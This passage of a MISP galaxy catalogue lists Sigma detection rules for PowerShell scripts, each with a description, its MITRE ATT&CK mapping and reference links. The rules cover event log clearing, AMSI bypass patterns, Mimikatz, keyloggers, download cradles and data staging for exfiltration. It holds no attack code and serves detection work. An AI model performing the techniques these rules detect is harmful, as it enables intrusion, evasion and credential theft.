https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml

Suspicious PowerShell Mailbox SMTP Forward Rule

Detects usage of the PowerShell Set-Mailbox cmdlet to set up an SMTP forwarding rule.

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Mailbox SMTP Forward Rule"

Table 9742. Table References

Links

https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml

Suspicious Eventlog Clear

Detects usage of known PowerShell cmdlets such as "Clear-EventLog" to clear the Windows event logs.

The tag is: misp-galaxy:sigma-rules="Suspicious Eventlog Clear"

Suspicious Eventlog Clear has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 9743. Table References

Links

https://twitter.com/oroneequalsone/status/1568432028361830402

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md

https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml

Suspicious Get Information for SMB Share

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Information for SMB Share"

Suspicious Get Information for SMB Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9744. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml

Suspicious FromBase64String Usage On Gzip Archive - Ps Script

Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.

The tag is: misp-galaxy:sigma-rules="Suspicious FromBase64String Usage On Gzip Archive - Ps Script"

Suspicious FromBase64String Usage On Gzip Archive - Ps Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 9745. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml

Malicious ShellIntel PowerShell Commandlets

Detects cmdlet names from ShellIntel exploitation scripts.

The tag is: misp-galaxy:sigma-rules="Malicious ShellIntel PowerShell Commandlets"

Malicious ShellIntel PowerShell Commandlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9746. Table References

Links

https://github.com/Shellntel/scripts/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml

WMIC Unquoted Services Path Lookup - PowerShell

Detects a known WMI reconnaissance method for finding unquoted service paths, often used inside PowerShell enumeration scripts by penetration testers and attackers.

The tag is: misp-galaxy:sigma-rules="WMIC Unquoted Services Path Lookup - PowerShell"

WMIC Unquoted Services Path Lookup - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9747. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py

https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml

Certificate Exported Via PowerShell - ScriptBlock

Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

The tag is: misp-galaxy:sigma-rules="Certificate Exported Via PowerShell - ScriptBlock"

Certificate Exported Via PowerShell - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 9748. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a

https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml

PowerShell Script Change Permission Via Set-Acl - PsScript

Detects PowerShell scripts that set the ACL of a file or a folder.

The tag is: misp-galaxy:sigma-rules="PowerShell Script Change Permission Via Set-Acl - PsScript"

PowerShell Script Change Permission Via Set-Acl - PsScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222" with estimative-language:likelihood-probability="almost-certain"

Table 9749. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl.yml

AMSI Bypass Pattern Assembly GetType

Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts.

The tag is: misp-galaxy:sigma-rules="AMSI Bypass Pattern Assembly GetType"

AMSI Bypass Pattern Assembly GetType has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9750. Table References

Links

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml

Suspicious Invoke-Item From Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

The tag is: misp-galaxy:sigma-rules="Suspicious Invoke-Item From Mount-DiskImage"

Suspicious Invoke-Item From Mount-DiskImage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"

Table 9751. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml

Security Software Discovery Via Powershell Script

Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus.

The tag is: misp-galaxy:sigma-rules="Security Software Discovery Via Powershell Script"

Security Software Discovery Via Powershell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 9752. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml

Powershell Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files.

The tag is: misp-galaxy:sigma-rules="Powershell Local Email Collection"

Powershell Local Email Collection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"

Table 9753. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml

Suspicious PowerShell Get Current User

Detects the use of PowerShell to identify the currently logged-on user.

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Get Current User"

Suspicious PowerShell Get Current User has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9754. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml

User Discovery And Export Via Get-ADUser Cmdlet - PowerShell

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file.

The tag is: misp-galaxy:sigma-rules="User Discovery And Export Via Get-ADUser Cmdlet - PowerShell"

User Discovery And Export Via Get-ADUser Cmdlet - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9755. Table References

Links

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml

Winlogon Helper DLL

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.

The tag is: misp-galaxy:sigma-rules="Winlogon Helper DLL"

Winlogon Helper DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

Table 9756. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml

Suspicious Service DACL Modification Via Set-Service Cmdlet - PS

Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe" or "Get-Service" (works only in PowerShell 7).

The tag is: misp-galaxy:sigma-rules="Suspicious Service DACL Modification Via Set-Service Cmdlet - PS"

Suspicious Service DACL Modification Via Set-Service Cmdlet - PS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9757. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml

Potential Invoke-Mimikatz PowerShell Script

Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.

The tag is: misp-galaxy:sigma-rules="Potential Invoke-Mimikatz PowerShell Script"

Potential Invoke-Mimikatz PowerShell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9758. Table References

Links

https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml

Troubleshooting Pack Cmdlet Execution

Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or actions similar to the "msdt" LOLBin (as described in LOLBAS).

The tag is: misp-galaxy:sigma-rules="Troubleshooting Pack Cmdlet Execution"

Troubleshooting Pack Cmdlet Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 9759. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

https://twitter.com/nas_bench/status/1537919885031772161

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml

Active Directory Computers Enumeration With Get-AdComputer

Detects usage of the "Get-AdComputer" cmdlet to enumerate computers or their properties within Active Directory.

The tag is: misp-galaxy:sigma-rules="Active Directory Computers Enumeration With Get-AdComputer"

Active Directory Computers Enumeration With Get-AdComputer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

Table 9760. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml

Detected Windows Software Discovery - PowerShell

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

The tag is: misp-galaxy:sigma-rules="Detected Windows Software Discovery - PowerShell"

Detected Windows Software Discovery - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

Table 9761. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md

https://github.com/harleyQu1nn/AggressorScripts

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml

Invoke-Obfuscation Via Use Clip - Powershell

Detects obfuscated PowerShell that uses Clip.exe in scripts.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - Powershell"

Invoke-Obfuscation Via Use Clip - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9762. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml

Suspicious Connection to Remote Account

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism.

The tag is: misp-galaxy:sigma-rules="Suspicious Connection to Remote Account"

Suspicious Connection to Remote Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

Table 9763. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml

Suspicious Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

The tag is: misp-galaxy:sigma-rules="Suspicious Mount-DiskImage"

Suspicious Mount-DiskImage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"

Table 9764. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image

https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml

Potential Suspicious PowerShell Keywords

Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious PowerShell Keywords"

Potential Suspicious PowerShell Keywords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9765. Table References

Links

https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1

https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7

https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1

https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml

Recon Information for Export with PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

The tag is: misp-galaxy:sigma-rules="Recon Information for Export with PowerShell"

Recon Information for Export with PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 9766. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml

Potential Suspicious Windows Feature Enabled

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature", which acts as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Windows Feature Enabled"

Table 9767. Table References

Links

https://learn.microsoft.com/en-us/windows/wsl/install-on-server

https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps

https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml

Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy

Detects PowerShell activity in which Get-AdDefaultDomainPasswordPolicy is used to get the default password policy for an Active Directory domain.

The tag is: misp-galaxy:sigma-rules="Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy"

Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 9768. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml

Suspicious Start-Process PassThru

Detects PowerShell use of the PassThru option to start a process in the background.

The tag is: misp-galaxy:sigma-rules="Suspicious Start-Process PassThru"

Suspicious Start-Process PassThru has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 9769. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml

Remove Account From Domain Admin Group

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.

The tag is: misp-galaxy:sigma-rules="Remove Account From Domain Admin Group"

Remove Account From Domain Admin Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 9770. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml

PowerShell Deleted Mounted Share

Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

The tag is: misp-galaxy:sigma-rules="PowerShell Deleted Mounted Share"

PowerShell Deleted Mounted Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 9771. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml

Suspicious TCP Tunnel Via PowerShell Script

Detects PowerShell scripts that create sockets or listeners, which could be indicative of tunneling activity.

The tag is: misp-galaxy:sigma-rules="Suspicious TCP Tunnel Via PowerShell Script"

Suspicious TCP Tunnel Via PowerShell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 9772. Table References

Links

https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml

PowerShell ShellCode

Detects Base64-encoded shellcode.

The tag is: misp-galaxy:sigma-rules="PowerShell ShellCode"

PowerShell ShellCode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9773. Table References

Links

https://twitter.com/cyb3rops/status/1063072865992523776

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml

Suspicious Get Local Groups Information - PowerShell

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Local Groups Information - PowerShell"

Suspicious Get Local Groups Information - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9774. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml

Zip A Folder With PowerShell For Staging In Temp - PowerShell Script

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Zip A Folder With PowerShell For Staging In Temp - PowerShell Script"

Zip A Folder With PowerShell For Staging In Temp - PowerShell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 9775. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml

Potential Keylogger Activity

Detects PowerShell scripts that contain references to keystroke-capturing functions.

The tag is: misp-galaxy:sigma-rules="Potential Keylogger Activity"

Potential Keylogger Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 9776. Table References

Links

https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content

https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0

https://twitter.com/ScumBots/status/1610626724257046529

https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml

Suspicious Process Discovery With Get-Process

Detects usage of Get-Process to list the processes that are running on the local computer.

The tag is: misp-galaxy:sigma-rules="Suspicious Process Discovery With Get-Process"

Suspicious Process Discovery With Get-Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 9777. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml

Clear PowerShell History - PowerShell

Detects keywords that could indicate clearing PowerShell history

The tag is: misp-galaxy:sigma-rules="Clear PowerShell History - PowerShell"

Clear PowerShell History - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9778. Table References

Links

https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml

Active Directory Group Enumeration With Get-AdGroup

Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory

The tag is: misp-galaxy:sigma-rules="Active Directory Group Enumeration With Get-AdGroup"

Active Directory Group Enumeration With Get-AdGroup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 9779. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml

Potential COM Objects Download Cradles Usage - PS Script

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

The tag is: misp-galaxy:sigma-rules="Potential COM Objects Download Cradles Usage - PS Script"

Potential COM Objects Download Cradles Usage - PS Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9780. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57

https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml

Malicious PowerShell Commandlets - ScriptBlock

Detects Commandlet names from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Commandlets - ScriptBlock"

Malicious PowerShell Commandlets - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

